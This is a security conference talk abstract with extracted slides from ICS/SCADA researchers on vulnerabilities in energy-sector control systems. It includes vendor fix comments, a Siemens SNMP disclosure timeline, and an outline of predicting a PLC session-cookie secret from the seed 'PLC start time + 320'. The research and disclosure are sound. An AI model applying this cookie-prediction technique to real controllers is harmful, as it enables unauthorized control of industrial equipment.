For two years SCADA StrangeLove speaks about Industrial Control Systems and nuclear plants. This year we want to discuss Green Energy. Our hackers' vision of Green Energy, SmartGrids and Cloud IoT technology.
We will also speak about the security problems of traditional "heavy" industrial solutions, about the things that Zurich Airport and Large Hadron Collider have in common On top of it you will learn about our new releases, some funny and not so funny stories about discovery and fixing of vulnerabilities and the latest news from the front struggling for the Purity of Essence. Our latest research was devoted to the analysis of the architecture and implementation of the most wide spread platforms for wind and solar energy generation which produce many gigawatts of it. It may seem (not) surprising but the systems which manage huge turbine towers and household PhotoVoltaic plants are not only connected to the internet but also prone to many well known vulnerabilities and low-hanging 0-days. Even if these systems cannot be found via Shodan, fancy cloud technologies leave no chances for security. We will also speak about the security problems of traditional "heavy" industrial solutions, about the things that Zurich Airport and Large Hadron Collider have in common and why one should not develop brand new web server. Specially for the specialists on the other side of the fences, we will show by example of one industry the link between information security and industrial safety and will also demonstrate how a root access gained in a few minutes can bring to nought all the years of efforts that were devoted to the improvement of fail-safety and reliability of the ICS system. On top of it you will learn about our new releases, some funny and not so funny stories about discovery and fixing of vulnerabilities and the latest news from the front struggling for the Purity of Essence.
──────────
➤Speaker: Sergey Gordeychik, Aleksandr Timorin
2. Group of security researchers focused on ICS/SCADA
to save Humanity from industrial disaster
and to keep Purity Of Essence
Alexander Timorin
Alexander Tlyapov
Alexander Zaitsev
Alexey Osipov
Andrey Medov
Artem Chaykin
Denis Baranov
Dmitry Efanov
Dmitry Nagibin
Dmitry Serebryannikov
Dmitry Sklyarov
Evgeny Ermakov
Gleb Gritsai
Ilya Karpov
Ivan Poliyanchuk
Kirill Nesterov
Roman Ilin
Sergey Bobrov
Sergey Drozdov
Sergey Gordeychik
Sergey Scherbel
Timur Yunusov
Valentin Shilnenkov
Vladimir Kochetkov
Vyacheslav Egoshin
Yuri Goltsev
Yuriy Dyachenko
18. --snip--
Comment to PT-SOL-2014001:
The upload path has been changed. It is still possible to upload files, but they
can't overwrite system critical parts any more.
Comment to PT-SOL-2014002:
The system backup is created in a randomly chosen path an deleted afterwards.
Therefore an unauthorized access is made much more difficult and very unlikely.
Second comment to PT-SOL-2014002:
In order to compensate the weak encryption in the configuration file, the whole
configuration file is now encrypted via the new HTTP transmission.
--snip--
69. 3e6cd1f7bdf743cac6dcba708c21994f - MD5 of ? (16 bytes)
d37fa1c3 - CONST (4 bytes)
0001 - user logout counter (2 bytes)
0001 - counter of issued cookies for this user (2 bytes)
00028ad7 - value that doesn’t matter (4 bytes)
0a00aac8 - user IP address (10.0.170.200) (4 bytes)
00000000000000008ad72143 - value that doesn’t matter (12 bytes)
So, what about
3e6cd1f7bdf743cac6dcba708c21994f ???
71. SECRET is generates after PLC start by PRNG.
PRNG is a little bit harder than standard C PRNG.
SEED in {0x0000 , 0xFFFF}
It’s too much for bruteforce (PLC so tender >_<)
72. What about SEED ?
SEED very often depends on time value
SEED = PLC START TIME + 320
320 by practical way: secret generates after ~ 3-4
seconds of PLC start using current time
How to obtain PLC START TIME ?
73. PLC START TIME = CURRENT TIME – UPTIME
Current time
Uptime
76. SCADASL:13.01.2013
S7 PLC private/public community string for SNMP protocol can't be changed …
Siemens:06.02.2013
… you cannot change the SNMP community string … This issue has no effect on security, as only
non-sensitive information can be changed via SNMP. … community strings changeable in TIA Portal
v12.5.
SCADASL:05.08.2013
… vulnerabilities related to S7 1500 and S7 1200 PLC in attached file … including hardcoded SNMP.
Siemens:22.10.2013
Hardcoded SNMP strings are in fact an issue …
We might eventually migrate to SNMPv3 …